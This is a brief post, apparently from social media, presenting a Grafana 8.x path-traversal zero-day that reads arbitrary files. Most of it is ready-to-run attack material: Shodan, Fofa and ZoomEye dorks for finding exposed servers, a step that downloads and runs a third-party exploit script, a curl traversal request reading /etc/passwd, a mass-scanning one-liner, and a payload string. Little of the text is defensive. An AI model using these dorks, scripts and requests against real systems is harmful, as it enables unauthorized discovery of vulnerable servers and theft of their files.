Grafana — Unauthorized Arbitrary Read File The latest Grafana unpatched 0Day LFI  is now being actively exploited, it affects only Grafana 8.0+

Dorks:

Shodan: title:"Grafana"
Fofa.so: app="Grafana"
ZoomEye: grafana

PoC:

wget <https://raw.githubusercontent.com/Gabriel-Lima232/Grafana-LFI-8.x/main/grafana-exploit.py>; chmod +x grafana-exploit.py;

python3 grafana-exploit.py <http://10.180.47.42:3000> /etc/passwd

OR

curl <http://10.180.47.42:3000/public/plugins/welcome/../../../../../../../../../../etc/passwd> --path-as-is

One line command to detect:

echo 'app="Grafana"' | fofa -fs 1000 | httpx -status-code -path "/public/plugins/graph/../../../../../../../../etc/passwd -mc 200 -ms 'root:x:0:0'

#grafana #lfi #bugbounty #pentest

payload : /dashboard/snapshot/*?orgId=0%20/invite/: